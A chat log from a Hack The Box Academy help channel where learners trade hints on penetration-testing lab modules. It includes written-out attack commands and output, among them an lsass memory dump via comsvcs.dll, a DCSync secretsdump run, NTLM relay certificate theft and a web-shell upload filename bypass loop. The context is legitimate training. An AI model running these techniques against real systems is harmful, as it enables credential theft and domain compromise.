oh aight thanks so much dude
Like having basics is more important
definitely learn that before advancing
This channel is dedicated for discussion of modules on Academy, please take this convo to #general
I still have no idea
can u nudge me a bit more please im so lost
you're not looking in the right place
It dont make sense the question lit asks for the contents of the first line IN the file, no?
Bruh I handed you the answer on a silver platter. Did you re-read the literally first thing the module tells you and combine it with my hint that you're not in the right place?
Thanks, I'll do it
Thanks @cloud urchin , finally I solved it and I've finished the module. I tried that password before, but it didn't work for me. I don't understand why, perhaps I didn't do the MAC bypass properly
Glad you got it
Yes, not showing the profiling output. Did you find a fix? Edit: Had to add all DNS names.
Please, the Password Attacks' skills assessment; when trying to enumerate the internal hosts, it would always return that the ports are filtered! are there special flags I need to use? Note: I am using SOCKS PROXY!
are you using proxychains to perform the network ports scan?
Yes! Because I can only access the DMZ01 VPN interface not the internal one!
So, a couple of questions:
- Are you using the provided workstation in Academy, e.g., the pwnbox?
  - If yes, run proxychains with sudo
- Are you performing a TCP scan using the appropriate parameter in nmap?
No. I am using my own VM not the pwnbox. Below is the nmap command I use:
proxychains4 nmap 172.16.119.10 -sT -Pn -n --open --stats-every=30s --disable-arp-ping -sV -O -T3
Modify the command to enumerate ports that are the most common ones that you can think of, such as 80, 135, 443, 445 and so on
as to build a proof-of-concept that works, if that doesn't work, check your proxychains' configuration
Alright; Thank you so much. I do appreciate!
Hi, I'm new here so I'm not sure if this is the right place to ask but I'm having some troubles in the "pentest in a nutshell" module, could anyone help me or point me in the right direction of where to go?
My problem is in the section "Linux System Enumeration": https://academy.hackthebox.com/module/296/section/3396
The first command I'm supposed to run is to download LinPEAS from GitHub using the following command:
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
however, when I run that command the connection keeps timing out and I don't know what is causing it, if I open the browser on the machine and try to manually search for GitHub it also times out so I'm not sure if that is normal and my issue lies elsewhere or if that is the issue
I am stuck on Attacking Common Applications Exploiting Web Vulnerabilities in Thick-Client Applications I cant download the fatty-server.jar file even if I recomple the code
can i dm someone regarding AEN i am confused due to subnetting
nvm got it
hello, i have a question that could be simple but i can't figure it out. i am doing the skills assessment of the linux privilege escalation module, last flag (/root folder). i used a vulnerability for the OS to become root. i try id and get id=0(root) gid=0(root) groups=0(root). i upgrade to a full interactive tty with python3. then i cd to /root and i get permission denied. i am root, why can't i access?
Can I DM you, I'm facing the same issue?
If you are doing the LLM Output Attacks skills assessment make sure you are **logged in** with the provided credentials. I just spent a whole day trying to figure it out from an unauthed position and it made me so mad because all I had to do was read the instructions 😒😒😒😒😒😒😒😒😒😒
hii, i need help regarding the module ATTACKING COMMON SERVICES...I AM STUCK AT SQL
any type of help will be much appreciated
i have a big problem with windows attack defense module, cannot connect to rdp. Tried changing vpn configs, resetting target, tried both from gui app and from cli, nothing. Also tried both native rdp and xfreerdp https://academy.hackthebox.com/module/176/section/1779
Yesterday it worked but when i connect it, use it for 5 mins and it just restarts
and my internet is pretty stable but tried changing that too and nothing
terrible module which i need to complete before doing my cdsa
Yeah you can DM.
bro can u pls help me in attack common services module
I can try, go ahead and DM unless you can explain what the issue is without spoiling.
so I've been learning ligolo-ng after doing the pivoting lab and i was wondering if anyone could explain a bit about the networking behind the reverse shells for me. say there is a machine on 10.0.0.0/8 subnet and I am on a 172.16.1.0/24 subnet when accessing it, and there is an internal network on 192.168.220.0/24, when I use ligolo-ng to access it, for some reason I am able to get a reverse shell back from another machine in the internal network (not where my ligolo agent is) when I call back to my 172 ip. I was wondering how do the machines in the internal network send packets back to me if they are not connected to me?
Use ligolo bro it is not mentioned in module but it is the best for pivoting it will give issues for rdp then use timeout:60000
maybe its some kind of cleanup script? What did you do to become root exactly?
What is the tool you are using and what is the error you are facing
Can you elaborate it bit more
so my ip is 172.16.1.2, and the machine I set up ligolo agent is 10.50.50.50, and I can access this normally. this machine is connected to an internal network on the 192.168.220.0/24 range, so then I got access to a machine in the internal network, and I ran a reverse shell using the 172.16.1.2 as the callback ip and it somehow works, but I don't get why it should work
how does the machine in the internal network know how to route the packets to 172.16.1.2
Oh okay got it, so what’s happening behind the scenes is when you are running the reverse shell you are giving the ip of your attack host, so when the payload gets executed it sends the connection back to the 10.50.50.50 machine where the agent is running, and via the agent you get the reverse shell of it because the agent routes the traffic back to the attack host
Uh you'd typically need an agent in the target machine to get it to call back
Same as when we run rdp from our machine once we set route in our kali or attack box
Well Ligolo is what's routing your traffic here, in essence it serves as a virtual cable to the 192.x network. The ip address ranges aren't really too important as long as there's a route which ligolo or whatever networking device handles which allows you to connect to 10.x from 172.x
TLDR: which network you're in doesn't matter if you have proper routing setup which ligolo takes care of
If any issue dm me I’ll explain it via graph
I give up zZ any one know the answer to snort fundamentals zz it’s been 4months and I still can’t get it I don’t know what I’m doing zZ
Also watch this
The Pivoting Lab SnapLabs template: https://jh.live/pivoting
Free Cybersecurity Education and Ethical Hacking with John Hammond
i used this one liner: https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640---POC-Escalation/tree/main
How can you see the nmap result man🤣🤣
Easily 
It did make my job easy in one of the modules but Idk I like ligolo, it is good for double, triple hops
We just have to use timeout that’s the only issue for now
If it's more than a double hop I'd use Ligolo tbh
Hey I'm working on the Pass the Certificate section in the Password Attacks module (https://academy.hackthebox.com/module/147/section/1335) I tried the NTLM Relay Attack method but once I force a connection to ntlmrelayx it times out and doesn't produce a certificate. For the shadow credentials method when I try to run evil-winrm it says Cannot find KDC for realm "INLANEFREIGHT.LOCAL" . I made sure I added the hosts to /etc/hosts and made the changes needed to /etc/krb5.conf so I'm not sure where i'm going wrong here. Please advise, Thanks!
Why did I get an incorrect answer, in fact, I input the correct answer like, HTB{.......}
Could you share error
Is Bloodhound preinstalled in HTB pwnbox?
maybe make sure that in the /etc/hosts file, the ip address is the dc01 ip address and not the CA service ip address
I get this error when trying to run Bloodhound in my pwnbox:
Docker is installed on this system, but the daemon is not running.
Is there a fix for this?
thanks I get it now. I was being a dumbass, the 10.50.50.50 machine has virtualbox and all those machines in the internal network are virtualized under it so ofc they go through the host machine and then they know how to get back to me
try and manually start the service for the bloodhound application
this is what my /etc/hosts looks like
shouldn't it be .local not .htb
yea should be .local
inlanefreight.local and dc01.inlanefreight.local
gotchu I'll try that
also as someone above said make sure that it is also configured on ur /etc/krb5.conf
u can know how to do that from the previous section in the same module
I changed the /etc/krb5.conf and /etc/hosts to inlanefreight.local and got the same error. In the krb5.conf It's now:
[libdefaults] default_realm = INLANEFREIGHT.LOCAL
I tried using ./bloodhound-cli but idk why the GUI isn't working.
that's great
Thanks for the help!
ofc
i am not that familiar with bloodhound tbh, but maybe try and find a way to install it manually if docker isn't working, or reinstall it again
Yeah most of that was there by default so I didn't touch it
Hi
Still struggling with "Web Services and API attacks", whenever I try to send a request to the target, I only get 500 responses. When I send a SOAP request for an action, am I supposed to send it to the http://target:port/wsdl?wsdl or is there a better endpoint I'm supposed to send those to?
This is the script I'm using to test this out on, If someone would be kind enough to give me a sanity check and make sure I'm not doing something obviously wrong, I'd really appreciate it.
Im stuck on this too. Ive gone through the AD CS NTLM Relay Attack (ESC8) section and gotten /tmp/dc.ccache but it doesnt let me get the Administrator NT hash. Am i supposed to privesc through jesse?
Hello, I am on the Attacking Active Directory and NTDS.dit module https://academy.hackthebox.com/module/147/section/1326, I am on Q4. I have created the shadow copy, however, when I am trying to copy the NTDS.dit file it is responding with 'the process cannot access the file because it is being used by another process.' I wasn't sure if i should try killing the process on the target because i didn't want booted out or anything. Also, i think the hint on Q4 is actually meant for Q3...
make sure to properly configure krb5.conf and /etc/hosts
This is going to make me break my setup
Is there just a general lag to the academy domain ATM? I'm looking at 100mb download speed but nothing is really moving well in regards to any modules, refreshes etc.
When I run ntlmrelayx it connects but never gives any output other than SMBD-Thread-10 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.174
I got that error too the second time. I was able to do it successfully the first time but the second time I was getting an error and I reset it and it worked. I am still not able to get the Admin NT hash
Bro this is so scuffed
Command Injections
Page 12
Skills Assessment
What is the content of '/flag.txt'? i swear ive found the flag im sure of it but its telling me its incorrect any help ?
Make sure you don't have any additional spaces at the beginning or the end of the flag
tried that, its giving me a visual obfuscation for flag as 'f1l3' i feel like thats the problem
Hola Amigos,
I'm currently engaged with the Hacking Wordpress module and it seems like the module is broken.
I'm stuck at the User Enumeration section, i'm trying the same blog.inlanefreight.com to enumerate all users but there is no user present over there, not even admin. Moreover, the subdomain is directed to www.
Again, i tried with both module methods {curl -s -I http://blog.inlanefreight.com/?author=1 & curl http://blog.inlanefreight.com/wp-json/wp/v2/users | jq} but all negative.
Is there something really going for this module or am i just making a blunder!!
I just passed the skills assessment part of MSSQL, Exchange, and SCCM Attacks. The last 2 flags were pretty much accessible at the same step, so I am wondering if this was intentional? It feels like the SCCM part of the skills assessment was cut short ...
Can I get HTB pwnbox bloodhound neo4j default server user and password please?
neo4j:neo4j
Someone Please
tysm
I'm having difficulty with that too. I dumped the hashes on J01 and I accessed DC01 with s**m's credentials and dumped the hashes there but none seem correct. I saw that you solved it later with a hash you had already tried. Can you give a small hint just in case I'm having the same problem (maybe send a PM).
Done, i was making just extreme blunder
Can anyone tell me which module has more content and new stuffs to learn : "Intro to Python3" or "Password Attacks" from TIER I
My data is not uploading to bloodhound in pwnbox. I am uploading from a local folder to bolt://localhost:7687. How do I fix this?
Hwy
they have different things to learn, not necessarily "more and new"
if you know nothing about py3, then all of the intro module will be new to you
I spent 4 hrs on the public exploit module by overthinking and had to use a hint … should I be mad at myself ? Me repeating all these basic scans tho got it engrained in my mind now
you're just starting out, you're bound to overlook simple things
sometimes we just need a push in the right direction because we get too caught up and narrowed down
a simple shortcut to remember is that (typically, unless otherwise specified) ip:port when you spawn target => web
does anyone know how to fix this issue with ntlmrelayx, I've tried restarting the box a few times but this same error comes up whenever I try to run it. I can force a connection with printerbug.py but ntlmrelayx just times out without returning a certificate.
Do not upload computers.json
it's likely because it's not launching an http server, the pwnbox is running a service on port 80 (it's what serves the pwnbox to your browser) iirc you can change that port with a flag
does it matter what port?
I was running a bunch of banner and nmap scans and looking into the ports instead of just looking at the plugin they use shown in the site lol way overthunk it
just one that isn't in use, but i'd stick with the standard non-defaults -- 8000,8080
Hi, I'm working on the following question of the Dynamic Port Forwarding with SSH and SOCKS Tunneling part of the Pivoting, Tunneling, and Port Forwarding module :
Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.
I established a SOCKS tunnel with : ssh -D 9050 ubuntu@10.129.249.17
I checked /etc/proxychains.conf : tail -4 /etc/proxychains.conf
socks4 127.0.0.1 9050
But when I nmap to scan the internal target : proxychains nmap -vv -Pn -sT 172.16.5.19
No open port shows up, but we know from the question port 3389 is open. I can RDP to it using proxychains xfreerdp /v:<IP> /u:<USER> /p:<PASS>, but I can't find the port with nmap. Any idea why ?
make sure the socks5 one is commented out
but nmap and proxychains can be iffy at best sometimes
I checked, there is no such line on my config
It shows as filtered
filtered != closed
you're making a common mistake
filtered just means the reply didn't come back as closed, but also no reply came back
But why do I get no response as I know it is open ?
likely because the packet, for whatever reason, couldn't find its way back to you
So that's likely because of proxychains ?
yes
Alright thank you, I'll try running it over and over to see if it comes back as open
i wouldn't get too focused on it ¯_(ツ)_/¯
imho if you understand the basic principles of pivoting - ligolo-ng is far better and doesn't do any of that proxychains nonsense
also try with sudo
sudo proxychains nmap...
Ok I'll check it !
That was indeed the solution, thanks for your help
Youd need an external wireless adapter
and can't I use computer card for this?
can someone validate my hash?
this is def not the hash
i know..i cant remove it
this wasn't my answer too so i guess its wrong
i got system privileges on dc01.. .this is the first time i cant get the administrator domain admin hash lol
try to review the section of the NTDS.DIT file
this is not a tip tho u have the whole module in front of u
where would the answer be other than the module itself 🤷🏻♂️
Just DM me which section you did and the hash and I can compare it to mine.
i didn't give u any methods, but sorry if that ruined ur process mb didn't mean it :/
no need.,. i deleted the message with the hash
You don't still have it?
Lol, I said to DM it. Which section was that from?
That does not match what I have. You can DM what you did.
no im just going to try everything in the NTDS.DIT section
@elder matrix in future, please don't share hashes -- even if only temporarily.
As a note ntlm hashes are formatted lm:nt
If lm is disabled; the lm portion will be the same for every user
If going through a proxy like burpsuite, it needs https
Also dont spoil module content
adding --http-port 8080 helped with the errors but it's still getting stuck here
ok
you're not using the domain controller's IP address G
-t http: //domaincontrollerip/certserv/certfnsh.asp
thats the domain controller ip, I tried the other one which didn't work either
Is this the Pass the Certificate in password attacks?
yeah
Oh weird for me the targets are 10.129.234.174 and 10.129.234.172 each time I spawn them.
Oh my god Im so stupid. I have to use 10.129.234.172 to get the Administrator NT hash dont i
I just restarted the targets, gonna see if that works
Ok I just did it. Do you wanna call and I can help you out?
Im working on the same module
r on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.129.234.172 as INLANEFREIGHT/DC01$ SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.174, attacking target http://10.129.234.172
[-] Authenticating against http://10.129.234.172 as / FAILED
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 13
[*] Writing PKCS#12 certificate to ./DC01$.pfx
[*] Certificate successfully written to file
Im gonna give it one more try. If that doesn't work I'll dm you
the issue looks like its in ur impacket-ntlmrelayx command.
the -t option should NOT be the domain controller.
It's supposed to be CA01 ?
-t = target URL or host that you want to forward the captured NTLM authentication to.
However after I get the dc.ccache file I cant perform a DCSync attack to get the NT hash of the domain admin account
impacket-secretsdump -k -no-pass -dc-ip 10.129.234.174 -just-dc-user Administrator 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
(.venv) ┌─[us-academy-1]─[10.10.15.130]─[htb-ac-1369176@htb-qxdliwg7t8]─[~/PKINITtools]
└──╼ [★]$
Is this not the intended path?
hi! im doing academy Windows Attacks & Defense skills assessment but keep getting this error when RDP in to the windows box (WS001) - "The trust relationship between this workstation and the primary domain failed"
Ok I figured out where I was going wrong with ntlmrelayx
can anyone give some advice or pointers on Command Injections
Page 12
Skills Assessment
What is the content of '/flag.txt'?
Im still stuck on this
hi anyone can help me in password attack module
I try to this but i cant
y try to do --format=ripemd-128 but doesnt work
OK I just did it and it worked. I have no clue why or what I did differently so Im just gonna celebrate sadly i guess.
Module bugged as hell.
i did it.
I got the NTLM hash I'm just trying to crack it now
Not bugged, the related hashes/info is in the reading
You dont need to just PtH
^
I mean the the green check. 😄
It says completed, I didn't even submit answers.
Did you do the module previously?
I did it
I have no clue why my shi wasnt working. I must have been doing something wrong but I guess i did it
Could be. Did they change it?
thanks anyway
Yes
That's why then.
Oh true
Hi everyone, i have just started the service scanning module in Penetration Testing path and i set a VPN connection using openvpn. Can someone explain to me why this host is unreachable?
Tell me if u need more
If i run nc to the host 94.237.123.118 : 44269 it works, giving me the banner of the service
Copy and paste the command written on the module
I have a question, each machine has its own VPN?
No, each machine doesn't, but generally each module has one. You can download the vpn file when you're starting the module and it will serve you until you finish the module. Sometimes vpns from other modules also work
If i download the VPN file from the lab i cant use it for the academy?
Maybe this is the problem, where i can download the file for the academy?
in the bottom of each section of the module you will see a button download vpn file
Is this one?
yes this one
on kali linux this file is usually downloaded to home/user/Downloads folder and you can simply start it with the command openvpn /path/ to the vpn file
I have downloaded this file, connected using sudo openvpn but when i run nmap 10.129.42.253 it says me that the host seems down. nmap 10.129.42.253 is the first command shown on this module
Wait what kind of hacking is done here i dont know anything about it
sometimes it happens here that hosts are down
Im just trying to get back at someone in a harmless way
Oh sorry i didnt know mb
Ill leave then
yep
On the htb i see my connection active, on the academy i dont see it but i have just set the connection, as you have seen
Ok, how can see if there is no connections more?
On the htb, i still see the active connection
If i run ip a i dont see tun interfaces
now only connect one time and you should be fine
also don't use the pwnbox at the same time as the VPN if you are using the pwnbox too
Im trying
is that the target when you click click here to spawn target?
don't use both the labs and academy vpn at the same time
No, this is a command in the explanation
then that's why you're not connecting/seeing it
the example ip is just an EXAMPLE
Lol
Sorry im new here
I thought that command is a "real command", ready to try
always use the ip that's given after you click here to spawn target
it is a real command
you just need to replace the example ip with the spawned ip
Is anyone else working on Attacking Common Applications Module and have horrendous connections issues with the target machines
I have used that command
again the 10.129.42.253 is an example you need to replace it with whatever 10.129.x.x ip is given
another tip (and this is something you'd learn from the Introduction to academy module) is that if the module gives you an ip:port -- that is your only scope, you do NOT scan the ip, as it's a public container and your scope is solely the port given
but the examples won't always be 1 to 1 what you need to do
sometimes you need to modify slightly
This because i want to scan just the specific service and not the entire host right?
often you won't need to nmap scan the port, as you'll be given enough context from the module on what to do
and often it involves using web reconnaissance
This the result of ifconfig after i have set connection with academy VPN, is it correct?
Yes but there appears the network 10.10 and the IP spawned on the exercise of the module is 10.129
Because i have connected to a VPN server that set my IP at 10.10, and the target is 10.129?
iirc the users get assigned 10.10.0.0/16 and the machine spawns are 10.129.0.0/16 (if on the private lab network)
yes there's backend routing that allows you to connect to the 10.129 target
Seems its working, really appreciate your help🙏🏻
they shouldn't be outdated if you feel it's an error that hasn't already been reported -> #1234357888114364508
anyone here finished the Information Gathering - Web Edition module, and could write me a PM? I could use some help with answers to these messed up Wayback Machine questions... 🙄
they aren't messed up
if you're referring to the question regarding hackthebox, htb didn't always use .com
man this is some unnecessary waste of time with all these Wayback Machine questions imho
8 questions on the Wayback Machine
¯_(ツ)_/¯
but thanks for the hint
it's all useful to kinda get an idea of historical OSINT
/feedback exists :) (in this server)
Hello, in windows event logs skills assessment, I am wondering what the difference is between using FilterHashtable or not, because it looks like both outputs in powershell are the same? Just curious if there’s a specific reason why you might need to add that to a search
Anyone backed the artificial easy machine box that can help me out?
I can’t see
Ok
?
?
Can I DM anyone about Using Crackmapexec skill assessment?
You can DM me
Can anyone from Europe or US DM me ?
any reason for that?
am on the last step of the windows lateral movement skills assessment, could i get a slight nudge? im pulling my hair out here
Good day! Guys, please help me, I can't figure out what the login is for ssh.
Skills Assessment - Password Attacks
https://academy.hackthebox.com/module/147/section/1356
you mean the foothold? try generating usernames
I tried, it didn't work
i used username-anarchy iirc; you don't have to think about a password
(the reading brief explicitly gives you that info)
Okay, I'll try.
@fathom pendant Thank you very much! I found it!
You can DM me
done ty
Guys, having a mare here with Direct Prompt Injection, tried via three instances, I cannot tunnel the connection back via SSH...
Any advice?
Does the Live Engagement's foothold in Module: Shells & Payloads not have a browser?
I'm pretty sure you can just use xfreerdp for this if I recall correctly
I know, I have used xfreerdp to enter a linux system, but it does not have a browser in it
Oh yeah I remember that you have to run firefox through the terminal
Oh my god, thank you. At first I thought there was no browser, and I kept using curl to submit files, but it didn't work.
I'm such a fool
Guys, has anyone tried the file transfer module? In that, I have to upload a zip file via RDP, but how do I download that file on the attack machine? I tried using both curl and wget, but there is no internet connection
So how to do it
Hi Community
I can't get VNC creds in the CAPE skill assessment lab. I made user Arturo a local administrator on SUPPORT but can't find the VNC creds, please give some hints
Actually I use the browser machine, the zip file cannot be downloaded
?
Yes
Hello, I'm basically so stuck with this exercise in the command injection module. The first one worked right away, but the w\ho\am\i is exhausting me. I tried to base64 encode it and then use the bash command in the post request to decode it; it didn't work, it only returns the ip. I tried $(tr) to convert [ into a \, which also didn't work. I need a clue: what can I use to bypass the filter for this?
Oh my god, the password attacks module was so brutal. Finally done it
yeah it worked with single quotes
but i thought the exercise is to obfuscate the \
and i couldnt do that
it either gives me invalid input, which means the filter got it
or just executes the ip part
it's not a flag, I'm just practicing this exercise
it says try to execute those and if the filter gets you, try to bypass it
I couldn't bypass it with anything I tried to hide or convert the \
for the whoami command
its w\ho\am\i
you mean replace the \ with spaces ?
yeah that worked with me i guess my brain is just stuck with you have to bypass with w\ho\am\i
@cunning canopy tysm
Hello! I need some help with the File Inclusion skill assessment. So I basically got to the point where I'm in the Admin Panel and only need to use Log Poisoning in the access.log. But when I try the payload that adds a malicious script to the User-Agent header, it just doesn't give me back anything. I believe the app crashes whenever I try the payload. How am I supposed to solve it if the app crashes every time I try to use the final payload to get the flag?
Ok
Hi everyone i have one question from
https://academy.hackthebox.com/module/110/section/1055
third question
https://academy.hackthebox.com/module/263/section/3095
5th question
can anyone please assist me?
you can DM me
Hello everyone! Could you please tell me where to find the SSH password for svc_workstations?
https://academy.hackthebox.com/module/147/section/1657
For a question:
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
Ok, for those of you having trouble getting to .90 model accuracy in the Applications of AI in Infosec skills assessment, go back to the Fundamentals of AI module and refamiliarize yourself with the learning algorithms that are good for binary classification.
On the Bypassing Blacklisted Commands module, for the Bypassing Blacklisted Commands, I do not see the flag.txt file in the user's home directory that I found, is anyone else having an issue with that?
This is more appropriate for #1318239802931286066
Does anyone have notes for Networking Level 6?
The Open Systems Interconnection (OSI) model is a reference model developed by the International Organization for Standardization (ISO) that "provides a common basis for the coordination of standards development for the purpose of systems interconnection."
In the OSI reference model, the components of a communication system are distinguished in ...
Hello guys. I'm trying to do the set up for bloodhound from the active directory module about it (I forget the exact name of it, but the Tier 3 one)... and Bloodhound is being an absolutely stubborn horse to get working. I've tried what the module says, I've tried going through the specter ops manual and it just is refusing to work. I've even updated the etc file for bloodhound with the password and its still just... hating me. Anyone able to help? What is the easiest way to do it?
I used msfconsole to bruteforce an SMB service and tried to log in with all 4 credentials found but they don't work
when I try to log in I get this error
@acoustic owl thanks 🐰
Hello people, a quick question regarding the Password Attacks module. I cannot dump the lsass.exe with the command provided in the module: PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full, only using the task manager. I double checked the PID of lsass.exe. There is no AV on target system. CMD doesn't output anything, as if it reads the command, but quickly finishes with no result
is that the correct share name?
Yes, i launched cmd as admin
I mean, i completed the task but i won't rest until I can extract via shell
How can i upload screenshots
Can I dm u the screenshot?
it's actually written there which shell must be used i'm just blind
anyone able to lend a hand? Information Gathering - Web Edition
Page 19
Skills Assessment
After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
Try dumping to c:\users\public or a temp directory
Subdomains
solved
cool let me try
I'm having trouble with the live engagement module in the shell & payload section. The second host's webpage allows for file uploads, but only images. After uploading, the files are changed to .png or other image extensions. I've also tried intercepting them with Burp Suite, but it doesn't seem to change the content-type. I've looked at some hints, but I don't know which module in MSF to use. Any advice?
So which question are you working on?
Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt this,sir!
The previous question tells you which MSF payload and it should already be on the provided Foothold.
hii guys i am stuck at dns enumerations..i tried all what i can do..now its going off from my head
any type of help will be appreciated
I have made a little breakthrough. I used whatweb to find that the website has jquery, so I used unix/webapp/jquery_file_upload, but now I keep getting the error Exploit aborted due to failure: not-found: Could not find target
So you cannot find the target name? It's a foothold, so enumerate it some and you might find the host name somewhere; host names are often used with IPs.
I know the target name, but I don't know how to fill in the targeturi
You can DM what you have set for options.
you can dm me..don't wanna overload ricky
i can help you with that
try type?
Yup, now it's being displayed. Thanks
Hello everyone! Could you please tell me where to find the SSH password for svc_workstations?
https://academy.hackthebox.com/module/147/section/1657
For a question:
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
Yes.
Did you enumerate the crontab?
@crude halo Please take care not to post content from modules above tier 0
@teal arrow Please take care not to post content from modules above tier 0
Yes, I found that .sh file and impersonated that user, but SSH is asking for a password, and I can't find it
I'd look around the directory that .sh file is located and see if there is anything related to the user you are trying to abuse.
I have a genuine question. what modules in htb academy would yall say helped the most? I’m trying to get better at the machines but I bump into so many dead ends and end up looking at the write ups. any pointers would be appreciated
Good day guys
I'm new here
Hope I'm welcome 🤗🤗
Where can I get the password to the sample report in "Documenting & Reporting"
Or am i meant to complete the whole module before they give it to me or something
I'd say if you can identify the root cause behind your dead ends, that might help you determine what modules might aid you in increasing your results with the boxes.
You mean the one from Resources?
yes
It's in the Introduction to Documentation and Reporting section, paragraph heading About this Module, first paragraph. If you still can't find it you can DM.
Hi everyone, I have a huge question. I have extensive knowledge in the field, but I hardly put it into practice, especially on the web. I don't know what I should do. What I lack most is the hacker mentality and experience. I want to work with bugbounty, but here at htb, from what I've seen, there are practically no labs focused on the web. What should I do? I feel stuck
got it, thanks a lot ricky, i can tell that i'm not liking this module as much the last one
Anyone else have issues with the lab in the first lesson of the xss module?
As an option, I'll take a look, thanks!
If this doesn't get you anywhere, I'd look over the Keytab Extract section again.
Okey, thanks!
What distro am I supposed to use for my vm when doing modules?
Kali or Parrot
Better to ask somewhere like #general or #hacker-lounge. You'll need to follow the instructions in #welcome to gain access.
Whatever you want
Well, I'm not sure that helps much when I have no idea what the difference between different distros is. To chatgpt I go. 😭
So, no one want to answer my question about the first lab in the XSS module? The document. Cookie payload is not working and I tried it on both my own VM and the pwnbox…
Thanks 🙏🙏👍
I noticed I can't send message in the #general sir
Nvm I got it
Yep.. that's why I told you how to do it in the message you replied to.
I guess I have to login my HTB account on my phone
It's on my laptop 💻 before but I think it need to be on my phone too
Another question....
Pls
Why did my name change ?
Because you didn't follow the instructions in #welcome to verify your account. Your name will be corrected once you verify.
Okay copy.
Thanks 🙏👍🙏👍🙏👍
Tysm bro
Im running into this interesting thing with the footprinting smb module. I am trying to find more specific version information on the Samba service running on the server, but I can't get anything more specific than 4 and i need 4.x.x. I have used every tool and read the output. I honestly thought NMAP would have handled it with a -sV -sC scan of port 139,445 or even -A. I tried both still can't get the full version information.
I would very much also be open if one of the other tools could elicit more service information: smbclient, rpcclient, samrdump.py, enum4linux-ng, and netexec. I have read their man pages (or help descriptions if it didn't have a man page) and no flags seem to be capable of giving me what I need
Dude never mind, I was right, I had to turn on parrot OS and it gave me exactly what I needed with exactly the scan I thought I needed. Is vpning into htb gonna cost me information like that on the exam?
Did you find the answer for this?
if I have a question about one of the questions in a module/section or just general guidance on smth, is it best to ask it here or in the community help section?
module questions are better asked here; discord also has a search feature you can utilize to potentially find answers to your question if you look back enough
just don't spoil anything above t0; there's a pinned general guide for asking the questions
Hi, can someone assist me?
I'm facing an issue when using systemctl start ssh
it gives me two users, mrb3n and cry0l1t3, and when I use the password HTB_@cademy_stdnt!
it doesn't work. I tried it on both users. Linux Fundamentals, module 18 section 73
perfect, will keep that in mind, thank you
typically HTB_@cademy_stdnt! is the pw for the htb-student user
oh? so what would be the appropriate pass to use?
why are you trying to start ssh anyway?
also it helps to know what the section name is
Service and Process Management
trying to follow the instructions; while I read I try to do it myself
I even tried to do it outside the vpn but it didnt work
in order to ssh as a user, you need to have that user's password
since you don't have their passwords, you're not required to ssh into them
oo okkay
also, don't consider the examples "instructions"
they are just that, examples
the examples for starting an ssh server would be done on your machine, not on the target machine
does a walkthrough for medium level HTB modules exist
if it's above tier 0; it breaks the terms of service
the only "walkthroughs" that are official are the ones provided in the annual plans
Guys with xfreerdp3 how do i copy and paste texts to my pc? using +clipboard doesn't let me ctrl+c and v the flag
xfreerdp3 /u:Administrator /p:'HTB_@cad3my_lab_W1n10_r00t!@0' /v:10.129.210.98 /timeout:9999 /dynamic-resolution +clipboard
I have this as my command but it doesn't let me copy and paste
probably related to your hypervisor. i use vmware, works fine with vmwaretools installed.
works fine with me with virtbox
Guys! I was finally able to elevate privileges and run the Mimikatz tool on DC01. However, when I copy the NTLM hash to the HTB Lab, it indicates that it's invalid. What's going on?
To prove what I am saying:
For which section? It maybe just wants the NT hash?
This is the Skills Assessment - Password Attacks Module. This is the question --> What is the NTLM hash of NEXURA\Administrator?
DM me the hash you’re submitting
OK
Nvm that is the right format, if anyone who’s done the updated module could help him out
You can DM if you'd like.
Is anyone up for discussing File Upload?
I successfully uploaded a file by setting the content type and naming it shell.pHp.jpg. However, when I try to execute it, I only get a message saying, "cannot be displayed because it contains errors."
I suspect the server either doesn’t handle .php.jpg files as executable PHP or the upload directory doesn’t allow code execution. Unfortunately, I don’t have access to confirm this. I've also tried all the filenames from the script below:
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done
Any ideas that can help me please?
guys can someone help me with something
Quantum-Safe on the labs platform doesn't have a file to download or an oracle to communicate with
is that a prolab? this channel is for modules on academy. you'll need to follow the instructions in #welcome to gain access to the appropriate channel.
yea I know I am sorry for that but I can't find something related to labs
it's in challenges and it's not VIP
No Access
I know, that's why i told you how to get access
struggling on AD Enumeration & Attacks - Skills Assessment Part II
Crack this user's password hash and submit the cleartext password as your answer.
i have the users C*** NTLMv2 hash however trying to crack with hashcat -m 5600 keeps on getting exhausted with rockyou and a few other of the wordlists. any wordlist work for others?
Thank you bro
Are You add some modules of ad in password attacks? Is an interesting module , is not easy
https://academy.hackthebox.com/module/214/section/2285
I found it, but the answer isn't correct. May i dm the answer to someone who has actually completed it to see if i was right
im not sure what im putting in wrong, answer is in "commandLine: " for mimikatz. i got the full but idk whats going on
if it's not accepting the answer then it isn't the right answer
